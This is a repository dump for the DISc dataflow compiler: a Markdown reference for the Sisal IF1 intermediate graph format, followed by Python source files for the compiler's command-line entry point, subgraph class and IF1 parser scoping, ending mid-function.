(Stephen Skedzielewski 1985)`\n\nOn this page, we attempt to create a compact yet complete overview of the language that should be enough to write an IF1 parser without any previous IF1 knowledge.\n\nA few IF1 and Sisal examples are present in the repository; a copy of these examples is also present in the documentation:\n* [Simple piece of Sisal/IF1 code](_Simple.html)\n* [Simple call in Sisal/IF1](_Call.html)\n* [Select compound node in Sisal/IF1](_Select.html)\n* [Sorting algorithm in Sisal/IF1](_Sort.html)\n\n[TOC]\n\n# IF1 Concepts {#Concepts}\n\nIF1 represents directed, acyclic graphs; these graphs have a few components.\n\n* IF1 nodes are operations.\n * a node can have an arbitrary amount of in- and outputs.\n * IF1 defines over 50 nodes, that is, \"native\" operations.\n * The in- and output of a node happens through **ports**, which are numbered indicators of in- and output locations\n * Port indexing starts from 1\n * Not every node has a predefined amount of ports.\n* Edges represent data paths between nodes.\n * Edges carry **type information**\n * Not mandatory\n * Can describe user-defined types and built-in types.\n * A special edge exists to describe literal constants.\n * Don't contain a source port\n * Contain the value of a literal as a string.\n* Graph boundaries surround groups of nodes and edges.\n\n# IF1 Instructions {#Form}\n\nIF1 instructions are delimited by newlines. The first character after a newline determines the type of instruction the line represents; the rest of the line consists of a number of whitespace-separated fields, the amount of which depends on that specific instruction. Any extra text listed after the fields is considered to be a comment; so are lines that start with C. For more information about comments, look into [appendix A](#Comments).\n\nThe following table lists the different instruction types.\n\nCharacter | Represents | Syntax \n----------| -----------|-------\nT | type | `T label type_code arg_1 arg_2 `\nE | edge | `E source_node port destination_node port type `\nL | literal | `L destination_node port type string `\nG | subgraph of a compound node | `G type_reference `\nG | local function graph | `G type_reference \"name\" `\nX | global function graph | `X type_reference \"name\" `\nI | imported function | `I type_reference \"name\" `\nN | simple node | `N label operation `\n{ | start compound node | `{ Compound label operation`\n} | end compound node | `} label operation association_list_length association_list_element_1 association_list_element_2 ...`\n\n\nThe semantics of these instructions are explained below; explanations about *labels* and *types* are presented in the [labels and types](#types) section.\n\n* Simple nodes simply contain a label and an identifier; this identifier represents a native IF1 instruction. 
\n* Compound nodes contain subgraphs and represent more complex operations, such as a for loop.\n* The compound node contains a few subgraphs that represent parts of the compound node, such as the initialization and the condition check; the association list shows which subgraphs represent which action.\n* Graph boundaries represent a function and simply contain the type (check out the function type) and name of this function.\n* Graph boundaries have a scope associated with them; anything below the boundary declaration is part of the graph's scope until either a \"}\", \"G\", \"X\" or \"I\" is encountered.\n* Subgraphs in compound nodes are not required to give a type.\n* Edges simply contain the source node and the port on this node, along with the destination node and the port on that node that this edge leads to. Furthermore, the edge also contains the type of its data.\n* Literals contain their destination, the port on this destination, their type and a string version of their value. [Appendix B](#Literal_def) contains an overview of some of the most common literals.\n\n## Labels and Types {#types}\n\nIF1 instructions commonly contain a type identifier. The purpose of this section is to explain IF1 type definitions; any defined type is referred to by its *label*.\n\nLabels are represented by integers, and are used to identify nodes and types. Nodes and types do not share labels, that is, a node and a type may have the same integer as label without being related in any way. Type labels share a global scope, while node labels only have to be unique within their enclosing graph. It's also worth noting that a missing or unknown type is referred to by using the label 0.\n\nWith that being said, we can look at the type definitions:\n\n    T label type_code arg_1 arg_2\n\n* Label can be used to refer to the type later on.\n* The type code can be considered to be an argument that indicates what type of type we are dealing with. This code can be seen as a constructor for that type.\n* The exact use of the other codes depends on the type_code. They can be seen as the arguments to a type constructor.\n\nTo clarify this, let's look at a basic Sisal type, in this case the boolean.\n\n`T 1 1 0 %na=Boolean`\n\n* T implies that we are declaring a type\n* 1 is the *label* of the type; it will be used to refer to the type we are constructing from now on.\n* 1 is the *type_code* of the type. This particular type code tells us that we are dealing with a *basic code*.\n* From the information of the type_code, we know that 0 is a basic code; in this case, the basic code 0 represents a boolean.\n* The rest of the line is a comment; it tells us we are dealing with a boolean.\n\nWhat follows is a table of the possible type codes and their meaning.\n\nCode | Type | Argument 1 | Argument 2 \n-----|----------|------------|-----------\n0 | Array | Base type | ` none `\n1 | Basic code | Basic code | ` none `\n2 | Field | Field type | Next field\n3 | Function | Argument type | Result type\n4 | Multiple | Base type | ` none `\n5 | Record | First field | ` none `\n6 | Stream | Base type | ` none `\n7 | Tag | Tag type | Next tag\n8 | Tuple | Type | Next in tuple\n9 | Union | First Tag | ` none `\n\nIn the following sections, the different types are described.\n\n#### Basic types\n\nAs the example in the parent section indicates, basic types simply indicate a standard type; the argument is simply a code that tells us which type we are dealing with. 
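\n\nFor instance, assuming the basic codes listed in the table that follows, an array of integers could be declared by chaining two type lines (labels 2 and 3 are picked arbitrarily here):\n\n    T 2 1 3 %na=Integer\n    T 3 0 2 %na=ArrayOfInt\n\nLabel 2 declares the basic type integer (basic code 3), after which label 3 declares an array (type code 0) whose base type is label 2.\n\n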
A table with the basic types and their code can be found below.\n\nCode | Type\n-----|-----\n0 | Boolean\n1 | Character\n2 | Double\n3 | Integer\n4 | Null\n5 | Real\n6 | WildBasic*\n\n\\* This type does not appear in the official reference, but is generated by sisalc 14.1.\n\n#### Arrays and Streams\n\nArrays and streams simply point to the *label* of the type they contain.\n\n#### Records and fields, unions and tags, and tuples\n\nA record can be seen as a pointer to a field. It simply contains its label, the type_code that indicates it's a record and the *label* of its first field.\n\nA field contains its label, its type_code, the *label* of the type it contains, and the *label* of the next field. The last field contains 0 as the *label* that points to the next field.\n\nUnions and tags work in the same way; the only difference is that unions can be seen as a pointer to a tag. A tag points to the next tag like a field points to the next field.\n\nTuples follow the same \"contain your own type, point to the next one\" convention, but don't require an initial pointer.\n\n#### Functions\n\nA function type simply contains \"pointers\" to 2 tuples; the first tuple represents the arguments this function accepts, while the second tuple represents the result it returns.\n\nIn terms of higher level languages, the function type simply declares the function's signature, without the name.\n\n\n# Appendix A: Comments {#Comments}\n\n2 main types of comments exist in IF1: stamps and pragmas. Stamps are comments that occupy an entire line that starts with `C$`; pragmas are comments that are added after the fields of a line.\n\n## Stamps {#Stamps}\n\nStamps are used to mark some processing that has been done to a file; a few stamp types exist. A stamp line has the following syntax: `C$ stamp_type info`.\nThe following table provides an overview of the different stamp types.\n\nCharacter | Meaning\n----------|--------\nA | Array update analysis\nC | Structure checker\nD | Order nodes using data dependencies\nE | Common subexpression information \nF | Frontend\nL | Loop invariant removal\nO | Add offsets for use by the interpreter\nP | Partitioning analysis\nS | Stream analysis\nV | Vector analysis\n\n## Pragmas {#Pragmas}\n\nPragmas are used to add additional information to an instruction. Currently, 2 types of pragmas exist: pragmas that are generated by the compiler, and pragmas that are added after analyzing. Multiple pragmas can be added after a single instruction. Pragmas are terminated by a whitespace character. \n\nPragmas have the following syntax: `%<id>=<anything>,<otheranything> %<otherid>=<anything>`\n\nThe following table provides an overview of the meaning of different pragmas. 
The type column indicates the type of pragma; C indicates a compiler-generated pragma, while A indicates a pragma generated by analyzing.\n\nCharacter | Type | Meaning\n----------|------|---------\nbd | C | bounds\nna | C | name\nsl | C | source line\nop | C | op number with line of source\nar | A | size of activation record needed\nlz | A | edge carries a value that must be demanded\nmk | A | mark this edge by reference (%mk=r) or by value (%mk=v)\nof | A | offset in activation record\nst | A | style of memory allocation (%st=p for pointer, %st=c for contiguous)\nxy | A | position for node in graphic output\n\n# Appendix B: Literal Definitions {#Literal_def}\n\nType | String\n-----|-------\nFunction names | \"someName\"\nBoolean values | \"T\" or \"F\"\nInteger values | \"03349\"\nCharacters | \"'\\n'\" or \"'x'\"\nNull value | nil\nSingle-precision floating point value | \"3.503\" or \"5e3\" or \".503\"\nDouble-precision floating point value | \"6.626198d-34\" \".056D24\"\n\n# Appendix C: Nodes {#Nodes}\n\n<!--\narith = integer real double\nalgeb = arith + bool\natom = algeb + char\nT = any\n-->\n\nThe next section describes both the simple and compound nodes that IF1 predefines; a few datatype conventions should be established for this.\n\n* *arith* types correspond to any numeric type\n* *algeb* types correspond to arith types and booleans\n* *atom* types correspond to algeb types and characters\n* *T* corresponds to any type\n* `(T)+` Represents one or more occurrences of T\n* `(T)*` Represents zero or more occurrences of T\n* `[T]` Represents one or zero occurrences of T\n* `AS(T)` Represents an array or a stream that contains type T.\n* `ASM(T)` Represents an array, stream or multiple that contains type T.\n\n\n## Simple nodes {#Nodes_Simple}\n\nLabel | Name | Input | Output | Operation\n--------|-----------------------|-------------------------------|-----------------------------------|----------\n100 | AAddH | `AS(T) x T` | `AS(T)` | Add an element to the back of the array/stream\n101 | AAddL | `AS(T) x T` | `AS(T)` | Add an element to the front of the array/stream\n102 | AAdjust | **Unknown** | **Unknown** | **Unknown**\n103 | ABuild | `Int x (T)*` | `AS(T)` | Create an array/stream with a lower bound, following arguments are elements of the array\n104 | ACatenate | `AS(T) x (AS(T))+` | `Array(T)` | Catenate arrays/streams.\n105 | AElement | `AS(T) x Int` | `T` | Returns element at a given index. \n106 | AFill | `Int x Int x T` | `AS(T)` | Create an array/stream with a lower and upper bound and fill it with the last argument.<br/> An empty array/stream is created if the lower bound > upper bound\n107 | AGather | `Int x Mult(T) x [Mult(T)]` | `AS(T)` | **Only used in return subgraph** <br/>Creates an array or stream with the values of the 2nd argument, <br/>if the corresponding 3rd argument is true (or not given). <br/>The first argument represents the lower bound of the array.\n108 | AIsEmpty | `AS(T)` | `Bool` | Returns True if the array/stream is empty\n109 | ALimH | `AS(T)` | `Int` | upper bound of array/stream\n110 | ALimL | `AS(T)` | `Int` | lower bound of array/stream (always 1 in case of a stream)\n111 | ARemH | `ASM(T)` | `ASM(T)` | Remove last element, returns error if empty\n112 | ARemL | `ASM(T)` | `ASM(T)` | Remove first element, returns error if empty\n113 | AReplace | `Array(T) x Int x (T)+` | `Array(T)` | Returns a new array with the given value at the given idx of the old array. 
<br/> If multiple values are provided, they are placed consecutively\n114 | AScatter | `AS(T)` | `Multiple(T) x Multiple(Int)` | **Only appears in generator of forall nodes** <br/>Places array at port one, and the indices of this array at port 2.\n115 | ASetL | `Array(T) x Int` | `Array(T)` | Shifts the lower index of the array, all indices are shifted to reflect this\n116 | ASize | `AS(T)` | `Int` | Returns the amount of elements in the highest dimension of the stream/array\n117 | Abs | `Arith` | `Arith` | Absolute value\n118 | BindArguments | `Func x (T)*` | `Func` | Returns a new function with the given arguments bound to it.\n119 | Bool | `Int` | `Bool` | 0 => false, 1 => true, anything else => error\n120 | Call | `Func x (T)*` | `(T)+` | Call a function (function is represented as literal)\n121 | Char | `Int` | `Char` | Maps to the appropriate character value (or to an error)\n122 | Div | `Arith x Arith` | `Arith` | Division; when applied to integers, rounds to an integer.\n123 | Double | `Real OR Int` | `Double` | Converts to double, returns an error if the value cannot be represented as a double\n124 | Equal | `Atom x Atom` | `Boolean` | `==`\n125 | Exp | `Arith x Arith` | `Arith` | `exp(x,y) = x^y` May lead to errors depending on input\n126 | FirstValue | `Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Returns the first value for which the corresponding bool is true (if present)\n127 | FinalValue | `Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Returns the last value for which the corresponding bool is true (if present)\n128 | Floor | `Real OR Double` | `Int` | Rounds down, returns error if the result is not in the integer range.\n129 | Int | `Atom` | `Int` | Reals and doubles get rounded (floor after adding 0.5). Characters return the matching ASCII code. <br/>False maps to 0, True maps to 1. <br/>Returns an error if the value is out of the integer range.\n130 | IsError | `T x T` | `Boolean` | Returns true if the second error has the same value as the first (string literal). <br/>If the first value is the special *error* value, this function should match any error value.\n131 | Less | `Atom x Atom` | `Boolean` | `<` Both inputs should be of the same type\n132 | LessEqual | `Atom x Atom` | `Boolean` | `=<` Both inputs should be of the same type. 
Also represents boolean implication\n133 | Max | `Algeb x Algeb` | `Algeb` | Maximum when used on *arith* types, *or* when used on boolean types\n134 | Min | `Algeb x Algeb` | `Algeb` | Minimum when used on *arith* types, *and* when used on boolean types\n135 | Minus | `Arith x Arith` | `Arith` | `-`\n136 | Mod | `Arith x Arith` | `Arith` | Modulo\n137 | Neg | `Arith` | `Arith` | Negation\n138 | NoOp | `(T)+` | `(T)+` | Returns the input\n139 | Not | `Boolean` | `Boolean` | Not\n140 | NotEqual | `atom x atom` | `Boolean` | `!=` Also represents exclusive or when used on boolean types\n141 | Plus | `Algeb x Algeb` | `Algeb` | `+` when used on *arith* types, *or* when used on boolean types\n142 | RangeGenerate | `Int x Int` | `Multiple(Int)` | **Only appears in forall generator** <br/>Generates an inclusive sequence between the first and second int.\n143 | RBuild | **Unknown** | **Unknown** | **Unknown**\n144 | RElements | **Unknown** | **Unknown** | **Unknown**\n145 | RReplace | **Unknown** | **Unknown** | **Unknown** \n146 <br/>147<br/>148<br/>149| RedLeft<br/>RedRight<br/>RedTree<br/>Reduce | `func x T x Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Works like foldl, the 3rd argument determines if this element is used. <br/>The suffixes determine if the function is left, right, undetermined or pairwise associative. <br/>func is a string literal representing one of the following functions: <br/> {*sum, product,least, greatest, catenate*}\n150 | RestValues | **Unknown** | **Unknown** | **Unknown**\n151 | Single | `Double OR Int` | `Real` | Converts to real, error if it's outside the range of real numbers.\n152 | Times | `Algeb x Algeb` | `Algeb` | `*` when used on *arith* types, *and* when used on boolean types\n153 | Trunc | **Unknown** | **Unknown** | **Unknown**\n154 | PrefixSize | **Unknown** | **Unknown** | **Unknown**\n155 | Error | **Unknown** | **Unknown** | **Unknown**\n156 | ReplaceMulti | **Unknown** | **Unknown** | **Unknown**\n157 | Convert | **Unknown** | **Unknown** | **Unknown**\n158 | CallForeign | **Unknown** | **Unknown** | **Unknown**\n159 | AElementN | **Unknown** | **Unknown** | **Unknown**\n160 | AElementP | **Unknown** | **Unknown** | **Unknown**\n161 | AElementM | **Unknown** | **Unknown** | **Unknown**\n170 | AAddLAT | **Unknown** | **Unknown** | **Unknown**\n171 | AAddHAT | **Unknown** | **Unknown** | **Unknown**\n172 | ABufPartition | **Unknown** | **Unknown** | **Unknown**\n173 | ABuildAT | **Unknown** | **Unknown** | **Unknown**\n174 | ABufScatter | **Unknown** | **Unknown** | **Unknown**\n175 | ACatenateAT | **Unknown** | **Unknown** | **Unknown**\n176 | AElementAT | **Unknown** | **Unknown** | **Unknown**\n177 | AExtractAT | **Unknown** | **Unknown** | **Unknown**\n178 | AFillAT | **Unknown** | **Unknown** | **Unknown**\n179 | AGatherAT | **Unknown** | **Unknown** | **Unknown**\n180 | ARemHAT | **Unknown** | **Unknown** | **Unknown**\n181 | ARemLAT | **Unknown** | **Unknown** | **Unknown**\n182 | AReplaceAT | **Unknown** | **Unknown** | **Unknown**\n183 | ArrayToBuf | **Unknown** | **Unknown** | **Unknown**\n184 | ASetLAT | **Unknown** | **Unknown** | **Unknown**\n185 | DefArrayBuf | **Unknown** | **Unknown** | **Unknown**\n186 | DefRecordBuf | **Unknown** | **Unknown** | **Unknown**\n187 | FinalValueAT | **Unknown** | **Unknown** | **Unknown**\n188 | MemAlloc | **Unknown** | **Unknown** | **Unknown**\n189 | BufElements | **Unknown** | **Unknown** | **Unknown**\n190 | RBuildAT | **Unknown** | **Unknown** | **Unknown**\n191 | RecordToBuf 
| **Unknown** | **Unknown** | **Unknown**\n192 | RElementsAT | **Unknown** | **Unknown** | **Unknown**\n193 | ReduceAT | **Unknown** | **Unknown** | **Unknown**\n194 | ShiftBuffer | **Unknown** | **Unknown** | **Unknown**\n195 | ScatterBufPartitions | **Unknown** | **Unknown** | **Unknown**\n196 | RedLeftAT | **Unknown** | **Unknown** | **Unknown**\n197 | RedRightAT | **Unknown** | **Unknown** | **Unknown**\n198 | RedTreeAT | **Unknown** | **Unknown** | **Unknown**\n\n\n## Compound Nodes {#Nodes_Compound}\n\nWhat follows is a table defining the different compound nodes and their labels; an explanation of every compound node follows afterwards.\n\nLabel | Name \n------|------\n0 | Forall \n1 | Select \n2 | TagCase \n3 | LoopA \n4 | LoopB \n5 | IfThenElse \n6 | Iterate \n7 | WhileLoop \n8 | RepeatLoop \n9 | SeqForall \n10 | UReduce \n\n### Select\n\n* Goal: The select node represents a multiway selection. Sisal only supports a 2-way selection, but this compound node could be used to implement different constructs such as a switch too.\n* Subnodes: \n * 1 predicate node that returns a number between 0 and n - 1, n being the amount of subnodes.\n * Every other node is a path that can be followed depending on the result of the predicate.\n* Association list:\n * At least 3 associations (predicate, iftrue and iffalse in case of if)\n * First element identifies predicate subgraph\n * Every other element identifies the subgraph to use for a given predicate result.\n* Signature: `(value)+ -> (value)+`\n\n### Forall\n\n* Goal: Independent execution of multiple instances of an expression\n* Subnodes: \n * **Generator:** Produce values for every instance of the body\n * **Body:** Expression to be evaluated\n * **Results:** Gathers the *ordered* results.\n* Association list:\n * Generator\n * Body \n * Returns\n* Signature: `(value)+ -> (value)+`\n\n### LoopA \n\n* Goal: Iterative looping construct. Stops when the *test* subgraph returns false. The test is executed after the body has executed once.\n* Subnodes: \n * Initialization\n * Test\n * Body\n * Returns\n* Association list:\n * Same order as subnodes\n* Signature: `(value)+ -> (value)+`\n\n### LoopB \n\n* Goal: Iterative looping construct. Stops when the *test* subgraph returns false. 
The test is executed before the body is executed for the first time.\n* Subnodes: \n * Initialization\n * Test\n * Body\n * Returns\n* Association list:\n * Same order as subnodes\n* Signature: `(value)+ -> (value)+`\n \n\n### TagCase\n\n**Unknown**\n\n### IfThenElse\n\n**Unknown**\n\n### Iterate \n\n**Unknown**\n\n### WhileLoop\n\n**Unknown**\n\n### RepeatLoop\n\n**Unknown**\n\n### SeqForall\n\n**Unknown**\n\n### UReduce \n\n**Unknown**\n\n\n\\page Simple Simple piece of Sisal/IF1 code\n\\include simple.sis\n\\include simple.if1\n![Simple](../examples/simple.dot.png)\n\n\\page Call Simple call in Sisal/IF1\n\\include call.sis\n\\include call.if1\n![Call](../examples/call.dot.png)\n\n\\page Select Select compound node in Sisal/IF1\n\\include select.sis\n\\include select.if1\n![Select](../examples/select.dot.png)\n\n\\page Sort Sorting algorithm in Sisal/IF1\n\\include sort.sis\n\\include sort.if1\n![Sort](../examples/sort.dot.png)\n\n" }, { "alpha_fraction": 0.7121265530586243, "alphanum_fraction": 0.7159929871559143, "avg_line_length": 32.85714340209961, "blob_id": "5cada8865bace452fbac9a11495c0093081a0ae8", "content_id": "63220f541a99a8b5cacbaf2e49a2a507a4b6f5f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2845, "license_type": "no_license", "max_line_length": 134, "num_lines": 84, "path": "/DISc/disc.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# disc.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package disc\n# \\brief DISc Main file\n#\n# This module contains the entry point for DISc. 
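\n#\n# A typical invocation might look like this (the file name is purely\n# illustrative):\n#\n#   ./disc.py program.sis --dot -ll 20\n#\n# 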
The module contains the\n# UI code, as well as the command line parser and exit handling.\n#\n# In short, it bundles all the components of DISc together and\n# allows the user to interact with these components.\n##\n\nimport argparse\nimport frontEnd\nimport backEnd\nimport IGR\nimport log\nimport sys\nimport os\n\n# ---------------------- #\n# Command line arguments #\n# ---------------------- #\n\nargParser = argparse.ArgumentParser(description = \"The DIS Compiler\")\n\nargParser.add_argument(\"path\", help = \"The path to the file you want to compile.\")\nargParser.add_argument(\"-d\", \"--dvm\", help = \"The path to DVM.\")\nargParser.add_argument(\"-o\", \"--output\", help = \"The location of the output file\")\nargParser.add_argument(\"-b\", \"--backEnd\", default = 'DVM', help = \"The backEnd to use.\")\nargParser.add_argument(\"-f\", \"--frontEnd\", type = str, help = \"The frontEnd to use.\")\nargParser.add_argument(\"-ll\", \"--logLevel\", type = int, default = 30, help = \"Specify the log level\")\n\nargParser.add_argument(\"--dot\", action = \"store_true\", help = \"Generate a dot graph of the program\")\nargParser.add_argument(\"--dry_run\", action = \"store_true\", help = \"Don't compile the program but abort after parsing the input file.\")\n\nargs = argParser.parse_args()\n\n# ------------- #\n# Program Setup #\n# ------------- #\n\nlog.setup(args.logLevel)\n\nfileName, fileExtension = os.path.splitext(args.path)\n\nfrontEnd.setUp(fileExtension, args.frontEnd)\nfrontEnd.fromFile(args.path)\n\nif args.dot:\n\tIGR.dot(skipCompound = False)\n\nif args.dry_run:\n\tsys.exit(0)\n\nbackEnd.setUp(fileName, args.backEnd, args.output)\nbackEnd.toFile()\n\n" }, { "alpha_fraction": 0.6938257813453674, "alphanum_fraction": 0.6960812211036682, "avg_line_length": 26.08823585510254, "blob_id": "8a4bf40d6233d5bd0f102281d64acac0082e417f", "content_id": "8126581fa9520190a842393eb1c6ee01acae8396", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3547, "license_type": "no_license", "max_line_length": 86, "num_lines": 136, "path": "/DISc/IGR/subgraph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# subgraph.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.subgraph\n# \\brief SubGraph definitions\n# \n# IGR subgraphs. 
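\n#\n# A rough usage sketch (the names below are hypothetical):\n#\n#   sg = SubGraph(entryNode, exitNode, \"main\", True)\n#   sg.addNode(someNode)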
\n##\n\n##\n# SubGraph\n# \n# An IGR subgraph is either a function body,\n# or a part of the compound node. \n#\n##\nclass SubGraph(object):\n\n\tdef __init__(self, entry, exit, name, isFunc):\n\t\tsuper(SubGraph, self).__init__()\n\t\tself.name = name\n\t\tself.entry = entry\n\t\tself.exit = exit\n\t\tself.nodes = []\n\t\tself.value = None\n\t\tself.isFunc = isFunc\n\n\t##\n\t# Printable subgraph\n\t##\n\tdef __str__(self):\n\t\tpair = \"(\" + str(self.entry) + \" | \" + str(self.exit) + \")\"\n\t\treturn \"'\" + self.name + \"' \" + \"subgraph \" + pair\n\n\t##\n\t# Get an output port of the subgraph. \n\t# This maps to the ports of the entry node.\n\t#\n \t# This may seem counterintuitive, but this is seen\n\t# from the perspective of the inside of the subgraph.\n\t# In which case the output port is used to retrieve data\n\t# from the subgraph.\n\t##\n\tdef getOutputPort(self, idx):\n\t\treturn self.entry.getOutputPort(idx)\n\n\t##\n\t# Gets an input port of the subgraph.\n\t# This maps to the input of the return (exit) node.\n\t#\n\t# Once again this is seen from the inside of the subgraph.\n\t# If we want to add data to the subgraph, we try to return it\n\t# to the outside world, which is done through the exit node.\n\t##\n\tdef getInputPort(self, idx):\n\t\treturn self.exit.getInputPort(idx)\n\n\t##\n\t# Add a node to the node list of the\n\t# subgraph.\n\t##\n\tdef addNode(self, node):\n\t\tself.nodes.append(node)\n\n\t##\n\t# See if a graph can be reduced to a \n\t# constant value.\n\t##\n\tdef isTrivial(self):\n\t\treturn self.value is not None\n\n\t##\n\t# Attach a constant to a subgraph.\n\t##\n\tdef reduce(self, value):\n\t\tself.value = value\n\n\t##\n\t# Remove a node.\n\t#\n\t# This only removes the node from the\n\t# node list. It does not clean up any \n\t# edges possibly leading to the node.\n\t#\n\t# It silently fails if the node does not \n\t# exist.\n\t##\n\tdef removeNode(self, node):\n\t\ttry:\n\t\t\tself.nodes.remove(node)\t\n\t\texcept ValueError: pass\n\n\t##\n\t# Replace a node.\n\t#\n\t# This replaces a node in the node list\n\t# of the subgraph by new. 
All of the input and\n\t# output ports of the node are added to new.\n\t##\n\tdef replaceNode(self, node, new):\n\t\tidx = self.nodes.index(node)\n\t\tself.nodes[idx] = new\n\n\t\tnew.inputs = node.inputs\n\t\tnew.outputs = node.outputs\n\t\tnew.inputPorts = node.inputPorts\n\t\tnew.outputPorts = node.outputPorts\n\n\t\tfor port in new.inputPorts:\n\t\t\tport.node = new\n\t\tfor port in new.outputPorts:\n\t\t\tport.node = new" }, { "alpha_fraction": 0.6707826852798462, "alphanum_fraction": 0.6761601567268372, "avg_line_length": 21.827272415161133, "blob_id": "ecf56d4003715eef6120ccf307f0dc8b691b484d", "content_id": "1413e2869e957512f0b956c03b3050e1634d75b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "no_license", "max_line_length": 79, "num_lines": 220, "path": "/DISc/frontEnd/IF1/environment.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# environment.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.environment\n# \\brief Node lookup and scoping rules.\n# \n# This module contains the "state" of the parser.\n# It keeps track of the discovered nodes and graphs\n# and the scopes they are in. 
\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ----- #\n# Frame #\n# ----- #\n\n##\n# Single part of the scope stack.\n# \n# A scope contains all of the definitions\n# of the current scope.\n#\n##\nclass Scope(object):\n\n\t##\n\t# Create a scope belonging to a subgraph.\n\t# By convention, the subgraph can always be \n\t# found at label 0.\n\t##\n\tdef __init__(self, subGraph = None):\n\t\tsuper(Scope, self).__init__()\n\t\tself.nodes = [subGraph]\n\n\t##\n\t# Add a node to the scope.\n\t#\n\t# The label of the node should match\n\t# the current length of the node list of this object.\n\t# This is the case since IF1 nodes are sequentially\n\t# numbered starting from one.\n\t#\n\t# \\param label\n\t# \t\tThe IF1 label of the node.\n\t# \\param node\n\t#\t\tThe IGR node to assign to the label\n\t##\n\tdef addNode(self, label, node):\n\t\tif len(self.nodes) == label:\n\t\t\tself.nodes += [node]\n\t\telse:\n\t\t\t# This situation can occur in IF1 (might be a bug)\n\t\t\t# so fill the list with None until the length is ok.\n\t\t\tlog.warning(\"Non-sequential node label added!\")\n\t\t\tpadding = [None for i in xrange(0, label - len(self.nodes))]\n\t\t\tself.nodes += padding\n\t\t\tself.addNode(label, node)\n\n\t##\n\t# Get a node from the scope.\n\t#\n\t# \\param label\n\t#\t\tThe label of the node to get\n\t##\n\tdef getNode(self, label):\n\t\treturn self.nodes[label]\n\n\t##\n\t# Get the subgraph of the scope.\n\t##\n\tdef getSubGraph(self):\n\t\treturn self.nodes[0]\n\n##\n# Single part of the scope stack.\n#\n# This scope is only to be used inside the global\n# environment of a compound node. It is meant to store\n# the various subgraphs of a compound node.\n##\nclass CompoundScope(object):\n\tdef __init__(self):\n\t\tsuper(CompoundScope, self).__init__()\n\t\tself.graphs = []\n\n\t##\n\t# Add a graph to the list of subgraphs\n\t##\n\tdef addSubGraph(self, graph):\n\t\tself.graphs.append(graph)\n\n# ------- #\n# Scoping #\n# ------- #\n\n##\n# A stack with the global scope at the bottom,\n# and the current scope at the top.\n##\n__STACK__ = [Scope()]\n\n##\n# Create a new scope and push\n# it on top of the stack.\n##\ndef 